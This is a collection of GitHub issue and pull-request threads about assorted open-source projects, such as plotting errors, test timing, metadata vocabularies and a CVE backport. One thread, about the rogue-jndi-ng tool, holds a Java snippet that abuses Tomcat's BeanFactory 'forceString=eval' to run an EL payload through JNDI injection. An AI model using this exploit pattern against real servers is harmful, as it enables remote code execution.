Plot not show Hi, I am running mne(v = 1.0) on VScode(Jupyter notebook) on macOS with M1 chip. I wanted to plot the raw data in the new qt-browser. But it only popped up the window, but no time series showed And the error message showed ImportError("Unable to load OpenGL library", *err.args) Hello @ts-mindyourmind, how did you install mne-qt-browser? Could you please paste the output of import mne mne.sys_info() I assume you didn't install the PyOpenGL package? It's recommended on macOS. can you try with raw.plot(scalings="auto") ? Alex Message ID: @.***> Did you install PyOpenGL? Also your mne-qt-browser is slightly outdated, the latest version is 0.3.0; the latest MNE version is 1.0.1 yes, I have installed PyOpenGL. And i upgraded the mne and qt-browser just now. still not working. still appreciate your help! okay, i will switch to a new environment and try again. Thanks again! @ts-mindyourmind Could your problem be resolved? If so, I will close this issue. Yes, it has been solved. Thank you! On 12 May 2022, at 15:13, Martin Schulz<EMAIL_ADDRESS>wrote: @ts-mindyourmindhttps://github.com/ts-mindyourmind Could your problem be resolved? If so, I will close this issue. — Reply to this email directly, view it on GitHubhttps://github.com/mne-tools/mne-qt-browser/issues/115#issuecomment-1125047457, or unsubscribehttps://github.com/notifications/unsubscribe-auth/ARK5HDRYPZJR3YRURDVKG4LVJUGXZANCNFSM5THP62RA. You are receiving this because you were mentioned.Message ID: @.***>
2025-04-01T06:39:38.939611
2024-06-02T22:40:09
2329895720
{ "authors": [ "moadmct" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8636", "repo": "moadmct/azure-pipelines-tasks", "url": "https://github.com/moadmct/azure-pipelines-tasks/pull/1" }
gharchive/pull-request
Update README.md branch1 Task name: Description: Documentation changes required: (Y/N) Added unit tests: (Y/N) Attached related issue: (Y/N) Checklist: [ ] Task version was bumped - please check instruction how to do it [ ] Checked that applied changes work as expected All good
2025-04-01T06:39:38.943274
2018-02-28T11:46:31
300993913
{ "authors": [ "moaxcp" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8637", "repo": "moaxcp/graph-dsl", "url": "https://github.com/moaxcp/graph-dsl/issues/109" }
gharchive/issue
Subgraphs Define components of graph graph { edge 'A', 'B' subgraph { edge 'C', 'D' subgraph { edge 'X', 'Y' } } edge 'Y', 'Z' } When a vertex or edge is added it is added to parent subgraphs and main graph (may need listeners) graphs are maps subgraph is a graph subgraph can have subgraphs if vertex or edge is missing an entry it will check all parent graphs for entry and return found value vertex or edge can be in multiple subgraphs subgraph is always same type as main graph (share type variable) subgraphs can be if a named subgraph is used inside other subgraphs what is the behavior. How does grapgviz do it? Graph { subgraph { color = 'blue' edge 'A', 'B' } } Edge and vertices will be blue. In graphviz If a default attribute is defined using a node, edge, or graph statement, or by an attribute assignment not attached to a node or edge, any object of the appropriate type defined afterwards will inherit this attribute value. This holds until the default attribute is set to a new value, from which point the new value is used. Objects defined before a default attribute is set will have an empty string value attached to the attribute once the default attribute definition is made.
2025-04-01T06:39:38.981350
2024-09-02T22:06:56
2501626713
{ "authors": [ "bartekpacia" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8638", "repo": "mobile-dev-inc/maestro", "url": "https://github.com/mobile-dev-inc/maestro/pull/2007" }
gharchive/pull-request
debug maestro-e2e-output not being present when tests fail The artifacts stopped appearing. Looks like it's caused by https://github.com/mobile-dev-inc/maestro/pull/2007. Sigh, GitHub Actions, the hopeless abomination.
2025-04-01T06:39:39.002111
2023-08-22T12:36:58
1861373234
{ "authors": [ "BWitsch", "peterlubrich" ], "license": "CC-BY-4.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8639", "repo": "mobilityDCAT-AP/mobilityDCAT-AP", "url": "https://github.com/mobilityDCAT-AP/mobilityDCAT-AP/issues/12" }
gharchive/issue
Comments from Maxx Dekkers Comments received from Maxx Dekkers (SEMIC Group), Email on July 21th, 2023: Property: Visibility status Could dct:accessRights not be used here? From the definition of this property at DCMI combined with the use of the EU vocabulary Access right it seems that that Dublin Core property would be able to serve the need. Property: Data Model Schema Could dct:conformsTo not be used here? The definition of DCAT includes a usage note for this property that seems to align quite well with the definition of your mobilitydcapap:dataModelSchema. My general comment here is that if you define ‘local’ properties where you could possibly reuse existing properties, you understand that those data will not be understandable to others outside your domain. So if you share catalogue records with a more general DCAT(-AP) implementation, the access restrictions are no longer maintained. For the distributions the information provided for dataModelSchema will be lost while it could still be useful for the user. Property: Legal Framework In the section on Controlled Vocabularies, there is a link to https://eur-lex.europa.eu/eli-register/eu_publications_office.html as the mandatory controlled vocabulary for the property legal framework. However, that link does not point to a controlled set of terms identifying particular legal documents, but points to information on the description schema for legal documents so I think it doesn’t fit there. Maybe the only thing necessary is to add to the usage note of the property that it is recommended to use ELI to refer to legislation whenever possible. By the way, ELI is not only used for European legislation; many countries already use it for national legislation, see https://eur-lex.europa.eu/eli-register/implementation.html. Class: Assessment One problem I see here is that you have mappings from two different semantic definitions to the same property (oa:hasBody) – although they really only differ in the expression of the information. First of all, this approach makes it impossible for an application that receives the data to distinguish between them, unless it looks at the encoding. Secondly, there are quite some restrictions on the use of a Literal as value on oa:hasBody. So, no language tag and only plain text allowed. Otherwise you’re encouraged to use oa:TextualBody. So, you could have a single property oa:hasBody with range rdfs:Resource with the usage note that, in case you don’t have a URL to point to, textual information can be included using the Embedded Textual Body construction, which allows you to specify text formats and languages which might be relevant for multilingual purposes. Regarding 2: Peter Lubrich: In fact, "dct:conformsTo" might be used "to indicate the model, schema, ontology, view or profile that this representation of a dataset conforms to". However, we introduced multiple properties under the class Distribution, that describe the technical format: format dct:format data model mobilitydcatap:dataModel data model version mobilitydcatap:dataModelVersion data model schema mobilitydcatap:dataModelSchema grammar mobilitydcatap:grammar -> Such differentiation is very specific to the transportation domain, and we want to have such clear differentiation ! -> We could now replace each of our proprietary properties above ("mobilitydcat-ap:...") with "dct:conformsTo". -> But then we would lose our intended differentiation ! -> On the other side, Maxx is right, any information from our proprietary properties might get lost when exchanging metadata with non-transportation portals! Your opinions? Regarding 3: I Peter Lubrich: The question here is: Is the ELI system a controlled vocabulary or not? Either way, we want to have it used for our property "mobilitydcatap:legalFramework". Suggestion: Add a hint in the usage note next to the property, linking to ELI, as suggested by Maxx. Still list the ELI in our section "Controlled vocabularies to be used", (so it doesn't get ignored), but also mention here that this is not a real Controlled Vocab! Regarding the "visibilty status": The idea behind was that data describtions could be unfinished, on hold or in generak not published. For statistics on data set this field has a hugh benefit for the NAPs. For operating the API for data exchange this is the filter to destinguish "sendable" or not. But it is not necessary to be in the DCAT-AP Profile if obly published data descritions are exchanged. Regarding 2 Data format "dct:conformsTo" The information around the data format, encoding, used schema and so on are very important for data user and data services!! Therefore we should have this differentiation. If we exchange meta data with other portals, it is up to the harvesting portal how they handle the more information. Regarding 4: I agree with Maxx' suggestion: we will only use one single property oa:hasBody, and make an additional usage note about (optional)textual information Regarding 1: I responded to Maxx as follows: _Well, when you look closely at the EU vocabulary for "Access right", it seems to controll the access to content data, whereas the meta data is exchanged in any case. In contrast, we wanted to controll the access/visibility of meta data. So, "Access right" seems not to be the right replacement for our proposed property. However, the only options for our property are "true" (=metadata is exchanged) or "false" (=metadata is not exchanged). The latter one is not relevant, as this metadata stays (temporarily) within the data platform. In thise sense, the "metadata visibility" is not a information to be exchanged, but more a platform-internal information. So, well will give up the "Visibility status" for now. We may re-introduce it at a later time, as they are some use cases with "limited" or "restricted" metadata visibility (in transportation, many (meta)data is considered non-open!). This means that only selected receivers can see the metadata, or that some receivers can only see partial metadata. We will discuss this later._ Regarding 1: We got a response by Makx as follows: I understand you want to look at this later. As this information is not going to be exchanged but rather used for the data platform itself, it could indeed be considered at a later stage. However, contrary to what you wrote, the CatalogRecord gives information about the metadata, so asserting dct:accessRights on CatalogRecord will give the visibility of the metadata, not of the content. To describe the visibility of the content, you would use the property dct:accessRights on dcat:Dataset. ->Conlusion: for mobilityDCAT-AP v1.0, the proposal is to take out the "visibility status" property. We might consider this again for v2.0, when we have a clearer picture about use cases of restricted metadata visibility. Regarding 2: We got a response by Makx as follows: Making these properties subproperties of dct:conformsTo indeed allows other DCAT implementations to understand what the general meaning of these properties is, so this makes sense. One additional comment is that, if we understand correctly, the dataModelVersion and dataModelSchema properties describe characteristics of the data model and not of the distribution, so it would be more correct to define those as properties of a separate entity, for example a class mobilitydcatap:DataModel, which could be a subclass of dct:Standard. ->Conlusion: I really like the proposal to introduce a new class "mobilitydcatap:DataModel". This class will be the range of property "mobilitydcatap:dataModel" (so far, it has the generic range "skos:Concept"). This class will be a sub-class of class "dct:Standard". This class have two optional properties: "owl:versionInfo" (formerly proposed as proprietary property "mobilitydcatap:dataModelVersion") "mobilitydcatap:dataModelSchema" (as sub-property of "dct:conformsTo") Regarding 3: We got a response by Makx as follows: In the work on High-Value Datasets, a property dcatap:applicableLegislation (applied to the DCATAP HVD extension here) was defined that has the same meaning as your property mobilitydcatap:legalFramework. You could use the more general property from the dcatap namespace. ->Conlusion: we change the property from "mobilitydcatap:legalFramework" to "dcatap:applicableLegislation" My conclusion for topics 1,2,3 above would also result in a modified UML diagram as follows. For example, note the new class "mobilitydcatap:dataModel" in the upper-right corner. I took over all proposals under "conclusions" above for point 1,2,3,4.
2025-04-01T06:39:39.017300
2020-07-06T15:19:42
651623115
{ "authors": [ "AkihiroSuda", "SamWhited", "thaJeztah" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8642", "repo": "moby/libnetwork", "url": "https://github.com/moby/libnetwork/pull/2570" }
gharchive/pull-request
[18.09 backport] bridge: disable IPv6 router advertisements Please consider backporting this fix for CVE-2020-13401. Thanks! Signed-off-by: Samuel Karp<EMAIL_ADDRESS>(cherry picked from commit 153d0769a1181bf591a9637fd487a541ec7db1e6) Signed-off-by: Sam Whited<EMAIL_ADDRESS> 18.09 is no longer maintained I know, sadly we still have to use the bump_18.09 branch at work and don't have a way to migrate off of it yet. /cc @adamparco
2025-04-01T06:39:39.140525
2023-04-22T19:25:08
1679668445
{ "authors": [ "mocelj", "utkarshayachit" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8643", "repo": "mocelj/azbatch-starter-connectivity", "url": "https://github.com/mocelj/azbatch-starter-connectivity/issues/6" }
gharchive/issue
linux jumbox doesn't have Az CLI installed After logging on to linux jumbox using bastion, az --version failed. It should have gotten installed since the init script is setup to install it. Perhaps the init script is not working as expected. fixed issue - replaced bash script of linux vm configuration with a cloud-init script. Linux VM needs to be deleted before redeploying the resources. closed issue
2025-04-01T06:39:39.143095
2017-10-06T15:46:51
263490610
{ "authors": [ "ScottFreeCode", "boneskull" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8644", "repo": "mochajs/mocha", "url": "https://github.com/mochajs/mocha/issues/3056" }
gharchive/issue
normalize suite and test titles This has bugged me since forever. Some suites and tests have titles like #foo or .foo and some which correspond to a function have parens (#foo()) and some don't. let's make sure this is consistent across the tests. I propose doing away with any leading or trailing punctuation Elsewhere I've seen # used to distinguish instance methods from static methods and parentheses used to distinguish methods from properties or around arguments where multiple overloads on different arguments are available. If we don't have any of that stuff, just non-overloaded instance methods, then we should be good getting rid of most of that syntax. that’s a jsdoc convention. it’ll be further confused by the private field syntax on he horizon. imo we should be decoupling the tests from the implementation as much as possible. The goal being that refactors won’t result in a bunch of broken tests. I’ll try to come up with an example of what that looks like. s/he/the. sorry GH on mobile sux
2025-04-01T06:39:39.154182
2017-11-10T11:29:24
272903018
{ "authors": [ "ScottFreeCode", "danielserrao" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8645", "repo": "mochajs/mocha", "url": "https://github.com/mochajs/mocha/issues/3100" }
gharchive/issue
First unit test always slower than the others. Prerequisites [x] Checked that your issue isn't already filed by cross referencing issues with the common mistake label [x] Checked next-gen ES issues and syntax problems by using the same environment and/or transpiler configuration without Mocha to ensure it isn't just a feature that actually isn't supported in the environment in question or a bug in your code. [x] 'Smoke tested' the code to be tested by running it outside the real test suite to get a better sense of whether the problem is in the code under test, your usage of Mocha, or Mocha itself [x] Ensured that there is no discrepancy between the locally and globally installed versions of Mocha. You can find them with: node node_modules/.bin/mocha --version(Local) and mocha --version(Global). We recommend avoiding the use of globally installed Mocha. Description For some reason the first unit test of my test suit is always slower than the others. When executing the tests in my console I get something like: √ unit test A (483ms) √ unit test B But in the code if I change the unit test B to above the unit test A, I get this: √ unit test B (470ms) √ unit test A For some reason the first unit tests gets always slower and because of that I think, the reason of being slow in not my code, but something in Mocha. At the same time I have others tests suits that are testing other code and it works fine, so I'm confused. Maybe is not Mocha, but due to not being sure, I need to ask if you have an idea of what can be happening. The test is something like this: let target = require('...'); describe('Module of unit tests', function () { this.timeout(1000); before(function () { ... target = proxyquire('...', { 'node-chartist': sinon.stub().resolves('...'), 'ws': function(){ return { 'close': function(){ /*Do nothing*/ }, 'send': function(){ /*Do nothing*/ }, 'on': function(arg, callback){ ... } }; } }); }); //Warning happens here it('unit test A', function () { ... target(); ... }); //If this unit test goes above unit test A, this will be the one to get the warning. it('unit test B', function () { ... target(); ... }); }) Steps to Reproduce I tried to reproduce in other projects without success, so I doubt you will be able to do it, but what I'm doing is: Execute tests suit with unit test A above. Execute tests suit with unit test B above. Expected behavior: [What you expect to happen] Don't get any warning about the time in both cases. Actual behavior: [What actually happens] The first unit test gets always a warning about the time. Reproduces how often: [What percentage of the time does it reproduce?] Around 90% of the times. Versions node v6.11.4 npm 3.10.10 mocha 4.0.1 sinon 4.1.2 chai 3.5.0 proxyquire 1.8.0 Additional Information I used fiddler to make sure that while executing the unit tests, none network request was being made for the outside, to make sure that the delay is not caused by any network request. I also debugged the code that the unit test is testing and I really don't see any reason for the delay in any case. One thing worth trying is copying everything that's common to the two tests, except for any assertions, into a before hook to see if simply running the same sort of stuff in another place makes the first place it runs of any sort slower, rather than the first test specifically. It's possible that the code, even if it's not necessarily slow in general, is initializing something the first time that then gets saved in some way (e.g. Node's require cache, or filesystem-level caches of data from the disk, or a reuse optimization built into some library code), or that the JavaScript engine looks for optimizations in the code after it runs once, or something like that. You could also put it outside the testsuite altogether, although that's less likely to work -- for a few types of caches, that would have more chance of the cache running out somewhere in between loading the test files and actually running this particular file's tests (on the other hand, if a before hook worked and outside the testsuite didn't, that might narrow down what sort of caching or optimization is responsible...). (And on a completely different note, more workaround than solution -- for anyone who just wants to suppress the time warning, there's the slow option to go with the timeout option.) Hi ScottFreeCode, Thanks for the response, it was very usefull. The problem was happening because I am making some stubs with proxyquire and by default the npm modules are loaded even when stubbed. In my case I have a module called node-chartist that was being loaded during the first unit test and that is why it was slower than the others. To solve this problem I had to use the method noCallThru() of proxyquire which make proxyquire don't load any original dependencies. Thanks for the help. Kind regards, Daniel Serrão Glad I could help you get that figured out! Let us know if there's anything else you need.
2025-04-01T06:39:39.164894
2021-03-10T11:44:55
827603135
{ "authors": [ "DJ-Glock" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8646", "repo": "mochajs/mocha", "url": "https://github.com/mochajs/mocha/issues/4602" }
gharchive/issue
Unable to update mocha to 8.3.1: fsevents@patch - Cannot apply hunk #1 Prerequisites [x] Checked that your issue hasn't already been filed by cross-referencing issues with the faq label [x] Checked next-gen ES issues and syntax problems by using the same environment and/or transpiler configuration without Mocha to ensure it isn't just a feature that actually isn't supported in the environment in question or a bug in your code. [x] 'Smoke tested' the code to be tested by running it outside the real test suite to get a better sense of whether the problem is in the code under test, your usage of Mocha, or Mocha itself [x] Ensured that there is no discrepancy between the locally and globally installed versions of Mocha. You can find them with: node node_modules/.bin/mocha --version(Local) and mocha --version(Global). We recommend that you not install Mocha globally. Description I'm trying to update mocha from version 8.2.1 to 8.3.1. Mocha is installed as dev dependency. Steps to Reproduce Set version 8.3.1 in package.json and run yarn or use upgrade-interactive or use yarn add mocha --dev. Expected behavior: Mocha 8.3.1 should be installed. Actual behavior: [What actually happens] Error occurred: ➤ YN0066: │ fsevents@patch:fsevents@npm%3A2.3.2#builtin<compat/fsevents>::version=2.3.2&hash=127e8e: Cannot apply hunk #1 (set enableInlineHunks for details) Versions The output of mocha --version and node node_modules/.bin/mocha --version: 8.2.1 The output of node --version: 12.18.3 Your operating system name and version: Windows 10 architecture (32 or 64-bit): 64-bit Your shell (e.g., bash, zsh, PowerShell, cmd): Powershell Your browser and version (if running browser tests): - Any third-party Mocha-related modules (and their versions): yarn 2.3.3. Any code transpiler (e.g., TypeScript, CoffeeScript, Babel) being used (and its version): - I searched for this error and found many issues from 2020, but all of them were resolved somehow. So not sure why it occurred for me especially on Windows. @juergba you might be right about optional. It looks like the chain is: mocha requires chokidar and chokidar requires fsevents, but optionally. I have no idea why yarn 2 tries to install optional dependency and flag --ignore-optional does not work as per this issue. I'll raise another issue for yarn team. Thanks. Update: it was a yarn issue. It looks like issue was fixed in yarn 2.4.1. We updated yarn to 2.4.0 - issue was in place, but after ipdating yarn to 2.4.1 everything is fine. Hope this will help someone.
2025-04-01T06:39:39.168131
2017-01-17T21:53:08
201416219
{ "authors": [ "Munter", "coveralls" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8647", "repo": "mochajs/mocha", "url": "https://github.com/mochajs/mocha/pull/2672" }
gharchive/pull-request
Coverage for node tests This PR does the following: Add nyc, istanbul-combine and coveralls as dependencies Adds an environment switch in the Makefile on COVERAGE=true, where coverage gathered from the test-node target and sub-targets Adds an npm coverage script that runs make test with COVERAGE=true for local coverage collection Adds coverage collection on travis for node 7 Posts coverage report to coveralls closes #2620 #2351 Thanks to @c089 for getting the basic setup in the Makefile working Changes Unknown when pulling 820d61639a95e808d58ea73f0860f7e139b2b7da on Munter:coverage-report into ** on mochajs:master**.
2025-04-01T06:39:39.173844
2022-06-14T17:47:39
1271145747
{ "authors": [ "AlexandreBrown" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8648", "repo": "mockative/mockative", "url": "https://github.com/mockative/mockative/issues/41" }
gharchive/issue
How do we mock flow/shared flow? Description Hello, I'd like to test that myDependency2.someFun() is called when receiving a value from myDependency1.myFlow which is a Flow<Unit>. class MyClass( private val coroutineScope: CoroutineScope, private val myDependency1: MyDependency1, private val myDependency2: MyDependency2, ) : MyClassInterface, CoroutineScope by coroutineScope { init { launch(coroutineContext) { myDependency1.myFlow.collect { myDependency2.someFun() } } } } Attempt @Mock private val myDependency1 = mock(MyDependency1::class) @Mock private val myDependency2 = mock(MyDependency2::class) private val myFlow = MutableSharedFlow<Unit>() ... "my test" { given(myDependency1).getter(myDependency1::myFlow) .whenInvoked() .thenReturn(myFlow) val myClass = MyClass(this, myDependency1, myDependency2) myFlow.emit(Unit) verify(myDependency2).function(myDependency2::someFun) .wasInvoked(exactly = 1.time) } Result (error) A mock of type MyDependency2 was not invoked the expected number of times. Expected 1 invocations of someFun() Actual: 0 No invocation on the mock were recorded. Turns out this was not an issue about Mockative. Closing this issue.
2025-04-01T06:39:39.210415
2017-01-14T09:24:58
200792663
{ "authors": [ "modelica-trac-importer" ], "license": "BSD-3-Clause", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8649", "repo": "modelica/Modelica", "url": "https://github.com/modelica/Modelica/issues/734" }
gharchive/issue
Wrong experiment annotation for Modelica.Mechanics.Translational.Examples.Accelerate Reported by beutlich on 2 May 2012 11:28 UTC Model Modelica.Mechanics.Translational.Examples.Accelerate has experiment keyword for Diagram annotation by mistake. See attached diff file for a simple fix. Migrated-From: https://trac.modelica.org/Modelica/ticket/734 Comment by dietmarw on 2 May 2012 11:37 UTC Thanks, it is already fixed in trunk in 8ae903717121f7689a300c0c9d66e2eee3820845. Comment by beutlich on 2 May 2012 11:47 UTC Fix should also be also included to /maintenance/3.2 branch. Comment by dietmarw on 2 May 2012 11:58 UTC Good point! Fix applied in 2aa9f4f0743210f1cc8e136b3ec95e03db13a1d5 for maintenance/3.2
2025-04-01T06:39:39.242195
2020-09-11T01:22:17
698692316
{ "authors": [ "chhsiao90", "elmer25", "mladBlum" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8650", "repo": "modelmapper/modelmapper", "url": "https://github.com/modelmapper/modelmapper/issues/561" }
gharchive/issue
Using modelmapper 2.3.8 with java.lang.ClassNotFoundException I am running with org.modelmapper:modelmapper:2.3.8 from Maven Central at https://search.maven.org/search?q=g:org.modelmapper When I attempt to run the ModelMapper inside an assembler (see below), `public class AccountAssembler implements DtoEntityAssembler<AccountEntity, AccountDto> { private static final AddressAssembler addressAssembler = new AddressAssembler(); private static final PhoneAssembler phoneAssembler = new PhoneAssembler(); public AccountEntity toEntity(AccountDto account) { ModelMapper mapper = new ModelMapper(); mapper.createTypeMap(AccountDto.class, AccountEntity.class) .addMapping(AccountDto::getAccountId, AccountEntity::setAccountId) // Integer .addMapping(AccountDto::getAddress, AccountEntity::setAddress) .addMapping(AccountDto::getBookerAccountKey, AccountEntity::setBookerAccountKey) // String .addMapping(AccountDto::getEmail, AccountEntity::setEmail) // String .addMapping(AccountDto::getKey, AccountEntity::setKey) // String .addMapping(AccountDto::getMap, AccountEntity::setMap) // String .addMapping(AccountDto::getName, AccountEntity::setName) // String .addMapping(AccountDto::getWebsite, AccountEntity::setWebsite); // String return mapper.map(account, AccountEntity.class); } public AccountDto toDto(AccountEntity account) { ModelMapper mapper = new ModelMapper(); mapper.createTypeMap(AccountEntity.class, AccountDto.class) .addMapping(AccountEntity::getAccountId, AccountDto::setAccountId) .addMapping(AccountEntity::getAddress, (dest, v) -> dest.setAddress(addressAssembler.toDto((AddressEntity) v))) .addMapping(AccountEntity::getBookerAccountKey, AccountDto::setBookerAccountKey) .addMapping(AccountEntity::getEmail, AccountDto::setEmail) .addMapping(AccountEntity::getKey, AccountDto::setKey) .addMapping(AccountEntity::getMap, AccountDto::setMap) .addMapping(AccountEntity::getName, AccountDto::setName) .addMapping(AccountEntity::getWebsite, AccountDto::setWebsite); return mapper.map(account, AccountDto.class); } }` I get the following root cause in my stack trace: Caused by: java.lang.ClassNotFoundException: sun.reflect.ReflectionFactory not found by modelmapper [18] I am using the Apache Felix framework. From my research, I understand that the sunb.reflect is not publicly available. I don't know how to work around this currently. Are there any ideas? I am currently running Java 8 and want to upgrade to the most recent Java version at a future time. I will remain running within a Java framework like Felix or similar. Any ideas how to get around this would be greatly appreciated. I think this issue is related to this one: https://github.com/modelmapper/modelmapper/issues/426 Can you check if latest modelmapper can reproduce this issue? Thanks! I am not the thread owner. Nevertheless I cannot reproduce the issue in the latest release (2.4.0). I was able to completly remove the jdk.unsupported attribute. Thank you! Thanks for the feedback! I will close the issue. Please feel free to reopen this issue or create a new one if this issue was still reproducible.
2025-04-01T06:39:39.249838
2023-09-12T09:19:19
1892061720
{ "authors": [ "hehaha68", "iotang", "sunbaigui" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8651", "repo": "modelscope/facechain", "url": "https://github.com/modelscope/facechain/pull/220" }
gharchive/pull-request
(zju_15) 提供 1 个新的风格模型 提供 1 个兼容 MajicmixRealistic_v6 的风格模型:雪山羽绒服风(Jacket in Snow Mountain)。 用于训练的人像 Jacket in Snow Mountain I tested this style, the effect is pretty good. Can we continue to tune the prompt and parameters a bit, the multiplier_style can be lower. My prompt and parameters: 'multiplier_style': 0.6, 'multiplier_human': 0.9, 'add_prompt_style': '1 girl, close-up, fur, ((jacket)), shirt, pants, winter, (bright sunny day, snow mountain, alpine slopes, snow), gyaru, fashion, trendy, gentle hair' I tested this style, the effect is pretty good. Can we continue to tune the prompt and parameters a bit, the multiplier_style can be lower. My prompt and parameters: 'multiplier_style': 0.6, 'multiplier_human': 0.9, 'add_prompt_style': '1 girl, close-up, fur, ((jacket)), shirt, pants, winter, (bright sunny day, snow mountain, alpine slopes, snow), gyaru, fashion, trendy, gentle hair' Wow, your tune results works obviously better. Let us update those prompts and parameters after merge. I tested this style, the effect is pretty good. Can we continue to tune the prompt and parameters a bit, the multiplier_style can be lower. My prompt and parameters: 'multiplier_style': 0.6, 'multiplier_human': 0.9, 'add_prompt_style': '1 girl, close-up, fur, ((jacket)), shirt, pants, winter, (bright sunny day, snow mountain, alpine slopes, snow), gyaru, fashion, trendy, gentle hair' Wow, your tune results works obviously better. Let us update those prompts and parameters after merge. hi, @iotang if there's a better parameter & prompt, chould you change it first, and update your style showcase. I updated parameter and prompts and the result is as shown below. Human LoRA may make the results different. Style image has been updated too.
2025-04-01T06:39:39.272344
2020-05-19T23:09:36
621341247
{ "authors": [ "aregm" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8654", "repo": "modin-project/modin", "url": "https://github.com/modin-project/modin/issues/1465" }
gharchive/issue
[Boards] test System information OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Modin installed from (source or binary): Modin version: Python version: Exact command to reproduce: Test from Github New test from Github
2025-04-01T06:39:39.275234
2020-07-10T16:39:23
654902423
{ "authors": [ "deepalib-cuelogic", "devin-petersohn", "pyrito" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8655", "repo": "modin-project/modin", "url": "https://github.com/modin-project/modin/issues/1706" }
gharchive/issue
self._query_compiler.columns RecursionError: maximum recursion depth exceeded while calling a Python object System information OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Modin version (modin.__version__): Python version: Code we can use to reproduce: Describe the problem Source code / logs Hi @deepalib-cuelogic thanks for posting! We need more information to reproduce and fix this issue. Can you share the code that produced this error? Thanks! Closing due to lack of information/reproducer.
2025-04-01T06:39:39.293368
2022-03-06T11:39:35
1160587978
{ "authors": [ "Nicolas-Ferre", "codecov-commenter" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8656", "repo": "modor-engine/modor", "url": "https://github.com/modor-engine/modor/pull/52" }
gharchive/pull-request
Create physics module Closes #40 Codecov Report Merging #52 (14f50af) into main (71779df) will increase coverage by 99.96%. The diff coverage is 99.52%. @@ Coverage Diff @@ ## main #52 +/- ## ========================================= + Coverage 0 99.96% +99.96% ========================================= Files 0 38 +38 Lines 0 3148 +3148 ========================================= + Hits 0 3147 +3147 - Misses 0 1 +1 Impacted Files Coverage Δ crates/modor/src/actions.rs 100.00% <ø> (ø) crates/modor/src/entities.rs 100.00% <ø> (ø) crates/modor/src/system_runner.rs 100.00% <ø> (ø) crates/modor_physics/src/lib.rs 100.00% <ø> (ø) crates/modor/src/testing.rs 99.20% <95.23%> (ø) ...rates/modor_physics/src/components/acceleration.rs 100.00% <100.00%> (ø) crates/modor_physics/src/components/position.rs 100.00% <100.00%> (ø) crates/modor_physics/src/components/scale.rs 100.00% <100.00%> (ø) crates/modor_physics/src/components/velocity.rs 100.00% <100.00%> (ø) crates/modor_physics/src/entities/delta_time.rs 100.00% <100.00%> (ø) ... and 33 more Continue to review full report at Codecov. Legend - Click here to learn more Δ = absolute <relative> (impact), ø = not affected, ? = missing data Powered by Codecov. Last update 71779df...14f50af. Read the comment docs.
2025-04-01T06:39:39.375693
2024-09-03T07:59:47
2502186539
{ "authors": [ "h0ng10", "hyeok-kong", "theGEBIRGE" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8658", "repo": "mogwailabs/rogue-jndi-ng", "url": "https://github.com/mogwailabs/rogue-jndi-ng/issues/1" }
gharchive/issue
Add support for Tomcat 10 With Tomcat 10, the expression Engine (within el-api.jar) moved to the jakarta.el package, thus the payload for tomcat does no longer work on Tomcat 10. We need to create a new Controller that handles this cases. Actual change would be minimal. Basically, simple change "javax.el.ELProcessor to "jakarta.ex.ELProcessor". //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true, "org.apache.naming.factory.BeanFactory", null); ref.add(new StringRefAddr("forceString", "x=eval")); ref.add(new StringRefAddr("x", payload)); Hello! I would like to contribute to this issue. Could you please assign it to me? :) Hi! It's already done, see d46724f677330653463b748ee7e284a94be58c0e.
2025-04-01T06:39:39.401196
2014-05-26T18:20:12
34322982
{ "authors": [ "data-doge", "thejsj" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8659", "repo": "mohayonao/timbre.js", "url": "https://github.com/mohayonao/timbre.js/issues/18" }
gharchive/issue
npm module requires 'lame' module, but it's not listed as a depndency When you try to require('timbre') it throws the following error. Warning: Cannot find module 'lame' from '/Users/jorgesilva/Sites/2014/clickOnJorge/node_modules/timbre' Use --force to continue. This seems to be because this package is not listed as a dependency in the package.json. Should be as simple as: npm install lame --save if yall are getting this error when using timbre.js with browserify, you can use the --ignore-missing to skip the unresolved requires for lame, ogg, and vorbis
2025-04-01T06:39:39.408283
2024-05-25T16:05:32
2317102020
{ "authors": [ "mohrazzak", "yangricardo" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8660", "repo": "mohrazzak/better-nestjs-zod-prisma", "url": "https://github.com/mohrazzak/better-nestjs-zod-prisma/issues/2" }
gharchive/issue
